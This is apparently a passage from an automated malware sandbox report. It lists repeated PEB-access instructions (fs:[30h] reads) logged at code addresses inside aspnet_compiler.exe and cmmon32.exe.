Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0130EA55 mov eax, dword ptr fs:[00000030h]	1_2_0130EA55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012D4257 mov eax, dword ptr fs:[00000030h]	1_2_012D4257
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012452A5 mov eax, dword ptr fs:[00000030h]	1_2_012452A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012452A5 mov eax, dword ptr fs:[00000030h]	1_2_012452A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012452A5 mov eax, dword ptr fs:[00000030h]	1_2_012452A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012452A5 mov eax, dword ptr fs:[00000030h]	1_2_012452A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012452A5 mov eax, dword ptr fs:[00000030h]	1_2_012452A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0125AAB0 mov eax, dword ptr fs:[00000030h]	1_2_0125AAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0125AAB0 mov eax, dword ptr fs:[00000030h]	1_2_0125AAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0127FAB0 mov eax, dword ptr fs:[00000030h]	1_2_0127FAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0127D294 mov eax, dword ptr fs:[00000030h]	1_2_0127D294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0127D294 mov eax, dword ptr fs:[00000030h]	1_2_0127D294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01272AE4 mov eax, dword ptr fs:[00000030h]	1_2_01272AE4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01272ACB mov eax, dword ptr fs:[00000030h]	1_2_01272ACB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01318D34 mov eax, dword ptr fs:[00000030h]	1_2_01318D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0130E539 mov eax, dword ptr fs:[00000030h]	1_2_0130E539
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01253D34 mov eax, dword ptr fs:[00000030h]	1_2_01253D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01253D34 mov eax, dword ptr fs:[00000030h]	1_2_01253D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01253D34 mov eax, dword ptr fs:[00000030h]	1_2_01253D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01253D34 mov eax, dword ptr fs:[00000030h]	1_2_01253D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01253D34 mov eax, dword ptr fs:[00000030h]	1_2_01253D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01253D34 mov eax, dword ptr fs:[00000030h]	1_2_01253D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01253D34 mov eax, dword ptr fs:[00000030h]	1_2_01253D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01253D34 mov eax, dword ptr fs:[00000030h]	1_2_01253D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01253D34 mov eax, dword ptr fs:[00000030h]	1_2_01253D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01253D34 mov eax, dword ptr fs:[00000030h]	1_2_01253D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01253D34 mov eax, dword ptr fs:[00000030h]	1_2_01253D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01253D34 mov eax, dword ptr fs:[00000030h]	1_2_01253D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01253D34 mov eax, dword ptr fs:[00000030h]	1_2_01253D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0124AD30 mov eax, dword ptr fs:[00000030h]	1_2_0124AD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012CA537 mov eax, dword ptr fs:[00000030h]	1_2_012CA537
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01274D3B mov eax, dword ptr fs:[00000030h]	1_2_01274D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01274D3B mov eax, dword ptr fs:[00000030h]	1_2_01274D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01274D3B mov eax, dword ptr fs:[00000030h]	1_2_01274D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0126C577 mov eax, dword ptr fs:[00000030h]	1_2_0126C577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0126C577 mov eax, dword ptr fs:[00000030h]	1_2_0126C577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01283D43 mov eax, dword ptr fs:[00000030h]	1_2_01283D43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012C3540 mov eax, dword ptr fs:[00000030h]	1_2_012C3540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01267D50 mov eax, dword ptr fs:[00000030h]	1_2_01267D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012735A1 mov eax, dword ptr fs:[00000030h]	1_2_012735A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01271DB5 mov eax, dword ptr fs:[00000030h]	1_2_01271DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01271DB5 mov eax, dword ptr fs:[00000030h]	1_2_01271DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01271DB5 mov eax, dword ptr fs:[00000030h]	1_2_01271DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_013105AC mov eax, dword ptr fs:[00000030h]	1_2_013105AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_013105AC mov eax, dword ptr fs:[00000030h]	1_2_013105AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01272581 mov eax, dword ptr fs:[00000030h]	1_2_01272581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01272581 mov eax, dword ptr fs:[00000030h]	1_2_01272581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01272581 mov eax, dword ptr fs:[00000030h]	1_2_01272581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01272581 mov eax, dword ptr fs:[00000030h]	1_2_01272581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01242D8A mov eax, dword ptr fs:[00000030h]	1_2_01242D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01242D8A mov eax, dword ptr fs:[00000030h]	1_2_01242D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01242D8A mov eax, dword ptr fs:[00000030h]	1_2_01242D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01242D8A mov eax, dword ptr fs:[00000030h]	1_2_01242D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01242D8A mov eax, dword ptr fs:[00000030h]	1_2_01242D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0127FD9B mov eax, dword ptr fs:[00000030h]	1_2_0127FD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0127FD9B mov eax, dword ptr fs:[00000030h]	1_2_0127FD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0125D5E0 mov eax, dword ptr fs:[00000030h]	1_2_0125D5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0125D5E0 mov eax, dword ptr fs:[00000030h]	1_2_0125D5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0130FDE2 mov eax, dword ptr fs:[00000030h]	1_2_0130FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0130FDE2 mov eax, dword ptr fs:[00000030h]	1_2_0130FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0130FDE2 mov eax, dword ptr fs:[00000030h]	1_2_0130FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0130FDE2 mov eax, dword ptr fs:[00000030h]	1_2_0130FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012F8DF1 mov eax, dword ptr fs:[00000030h]	1_2_012F8DF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012C6DC9 mov eax, dword ptr fs:[00000030h]	1_2_012C6DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012C6DC9 mov eax, dword ptr fs:[00000030h]	1_2_012C6DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012C6DC9 mov eax, dword ptr fs:[00000030h]	1_2_012C6DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012C6DC9 mov ecx, dword ptr fs:[00000030h]	1_2_012C6DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012C6DC9 mov eax, dword ptr fs:[00000030h]	1_2_012C6DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012C6DC9 mov eax, dword ptr fs:[00000030h]	1_2_012C6DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0127BC2C mov eax, dword ptr fs:[00000030h]	1_2_0127BC2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012C6C0A mov eax, dword ptr fs:[00000030h]	1_2_012C6C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012C6C0A mov eax, dword ptr fs:[00000030h]	1_2_012C6C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012C6C0A mov eax, dword ptr fs:[00000030h]	1_2_012C6C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012C6C0A mov eax, dword ptr fs:[00000030h]	1_2_012C6C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01301C06 mov eax, dword ptr fs:[00000030h]	1_2_01301C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01301C06 mov eax, dword ptr fs:[00000030h]	1_2_01301C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01301C06 mov eax, dword ptr fs:[00000030h]	1_2_01301C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01301C06 mov eax, dword ptr fs:[00000030h]	1_2_01301C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01301C06 mov eax, dword ptr fs:[00000030h]	1_2_01301C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01301C06 mov eax, dword ptr fs:[00000030h]	1_2_01301C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01301C06 mov eax, dword ptr fs:[00000030h]	1_2_01301C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01301C06 mov eax, dword ptr fs:[00000030h]	1_2_01301C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01301C06 mov eax, dword ptr fs:[00000030h]	1_2_01301C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01301C06 mov eax, dword ptr fs:[00000030h]	1_2_01301C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01301C06 mov eax, dword ptr fs:[00000030h]	1_2_01301C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01301C06 mov eax, dword ptr fs:[00000030h]	1_2_01301C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01301C06 mov eax, dword ptr fs:[00000030h]	1_2_01301C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01301C06 mov eax, dword ptr fs:[00000030h]	1_2_01301C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0131740D mov eax, dword ptr fs:[00000030h]	1_2_0131740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0131740D mov eax, dword ptr fs:[00000030h]	1_2_0131740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0131740D mov eax, dword ptr fs:[00000030h]	1_2_0131740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0126746D mov eax, dword ptr fs:[00000030h]	1_2_0126746D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0127A44B mov eax, dword ptr fs:[00000030h]	1_2_0127A44B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012DC450 mov eax, dword ptr fs:[00000030h]	1_2_012DC450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012DC450 mov eax, dword ptr fs:[00000030h]	1_2_012DC450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0125849B mov eax, dword ptr fs:[00000030h]	1_2_0125849B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_013014FB mov eax, dword ptr fs:[00000030h]	1_2_013014FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012C6CF0 mov eax, dword ptr fs:[00000030h]	1_2_012C6CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012C6CF0 mov eax, dword ptr fs:[00000030h]	1_2_012C6CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012C6CF0 mov eax, dword ptr fs:[00000030h]	1_2_012C6CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01318CD6 mov eax, dword ptr fs:[00000030h]	1_2_01318CD6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01244F2E mov eax, dword ptr fs:[00000030h]	1_2_01244F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01244F2E mov eax, dword ptr fs:[00000030h]	1_2_01244F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0127E730 mov eax, dword ptr fs:[00000030h]	1_2_0127E730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0127A70E mov eax, dword ptr fs:[00000030h]	1_2_0127A70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0127A70E mov eax, dword ptr fs:[00000030h]	1_2_0127A70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0126F716 mov eax, dword ptr fs:[00000030h]	1_2_0126F716
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0131070D mov eax, dword ptr fs:[00000030h]	1_2_0131070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0131070D mov eax, dword ptr fs:[00000030h]	1_2_0131070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012DFF10 mov eax, dword ptr fs:[00000030h]	1_2_012DFF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012DFF10 mov eax, dword ptr fs:[00000030h]	1_2_012DFF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0125FF60 mov eax, dword ptr fs:[00000030h]	1_2_0125FF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01318F6A mov eax, dword ptr fs:[00000030h]	1_2_01318F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0125EF40 mov eax, dword ptr fs:[00000030h]	1_2_0125EF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01258794 mov eax, dword ptr fs:[00000030h]	1_2_01258794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012C7794 mov eax, dword ptr fs:[00000030h]	1_2_012C7794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012C7794 mov eax, dword ptr fs:[00000030h]	1_2_012C7794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012C7794 mov eax, dword ptr fs:[00000030h]	1_2_012C7794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012837F5 mov eax, dword ptr fs:[00000030h]	1_2_012837F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0124E620 mov eax, dword ptr fs:[00000030h]	1_2_0124E620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012FFE3F mov eax, dword ptr fs:[00000030h]	1_2_012FFE3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0124C600 mov eax, dword ptr fs:[00000030h]	1_2_0124C600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0124C600 mov eax, dword ptr fs:[00000030h]	1_2_0124C600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0124C600 mov eax, dword ptr fs:[00000030h]	1_2_0124C600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01278E00 mov eax, dword ptr fs:[00000030h]	1_2_01278E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01301608 mov eax, dword ptr fs:[00000030h]	1_2_01301608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0127A61C mov eax, dword ptr fs:[00000030h]	1_2_0127A61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0127A61C mov eax, dword ptr fs:[00000030h]	1_2_0127A61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0125766D mov eax, dword ptr fs:[00000030h]	1_2_0125766D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0126AE73 mov eax, dword ptr fs:[00000030h]	1_2_0126AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0126AE73 mov eax, dword ptr fs:[00000030h]	1_2_0126AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0126AE73 mov eax, dword ptr fs:[00000030h]	1_2_0126AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0126AE73 mov eax, dword ptr fs:[00000030h]	1_2_0126AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0126AE73 mov eax, dword ptr fs:[00000030h]	1_2_0126AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01257E41 mov eax, dword ptr fs:[00000030h]	1_2_01257E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01257E41 mov eax, dword ptr fs:[00000030h]	1_2_01257E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01257E41 mov eax, dword ptr fs:[00000030h]	1_2_01257E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01257E41 mov eax, dword ptr fs:[00000030h]	1_2_01257E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01257E41 mov eax, dword ptr fs:[00000030h]	1_2_01257E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01257E41 mov eax, dword ptr fs:[00000030h]	1_2_01257E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0130AE44 mov eax, dword ptr fs:[00000030h]	1_2_0130AE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0130AE44 mov eax, dword ptr fs:[00000030h]	1_2_0130AE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012C46A7 mov eax, dword ptr fs:[00000030h]	1_2_012C46A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01310EA5 mov eax, dword ptr fs:[00000030h]	1_2_01310EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01310EA5 mov eax, dword ptr fs:[00000030h]	1_2_01310EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01310EA5 mov eax, dword ptr fs:[00000030h]	1_2_01310EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012DFE87 mov eax, dword ptr fs:[00000030h]	1_2_012DFE87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012716E0 mov ecx, dword ptr fs:[00000030h]	1_2_012716E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012576E2 mov eax, dword ptr fs:[00000030h]	1_2_012576E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01318ED6 mov eax, dword ptr fs:[00000030h]	1_2_01318ED6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012736CC mov eax, dword ptr fs:[00000030h]	1_2_012736CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012FFEC0 mov eax, dword ptr fs:[00000030h]	1_2_012FFEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01288EC7 mov eax, dword ptr fs:[00000030h]	1_2_01288EC7
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A5849B mov eax, dword ptr fs:[00000030h]	9_2_04A5849B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B014FB mov eax, dword ptr fs:[00000030h]	9_2_04B014FB
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04AC6CF0 mov eax, dword ptr fs:[00000030h]	9_2_04AC6CF0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04AC6CF0 mov eax, dword ptr fs:[00000030h]	9_2_04AC6CF0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04AC6CF0 mov eax, dword ptr fs:[00000030h]	9_2_04AC6CF0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B18CD6 mov eax, dword ptr fs:[00000030h]	9_2_04B18CD6
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A7BC2C mov eax, dword ptr fs:[00000030h]	9_2_04A7BC2C
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04AC6C0A mov eax, dword ptr fs:[00000030h]	9_2_04AC6C0A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04AC6C0A mov eax, dword ptr fs:[00000030h]	9_2_04AC6C0A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04AC6C0A mov eax, dword ptr fs:[00000030h]	9_2_04AC6C0A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04AC6C0A mov eax, dword ptr fs:[00000030h]	9_2_04AC6C0A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B01C06 mov eax, dword ptr fs:[00000030h]	9_2_04B01C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B01C06 mov eax, dword ptr fs:[00000030h]	9_2_04B01C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B01C06 mov eax, dword ptr fs:[00000030h]	9_2_04B01C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B01C06 mov eax, dword ptr fs:[00000030h]	9_2_04B01C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B01C06 mov eax, dword ptr fs:[00000030h]	9_2_04B01C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B01C06 mov eax, dword ptr fs:[00000030h]	9_2_04B01C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B01C06 mov eax, dword ptr fs:[00000030h]	9_2_04B01C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B01C06 mov eax, dword ptr fs:[00000030h]	9_2_04B01C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B01C06 mov eax, dword ptr fs:[00000030h]	9_2_04B01C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B01C06 mov eax, dword ptr fs:[00000030h]	9_2_04B01C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B01C06 mov eax, dword ptr fs:[00000030h]	9_2_04B01C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B01C06 mov eax, dword ptr fs:[00000030h]	9_2_04B01C06
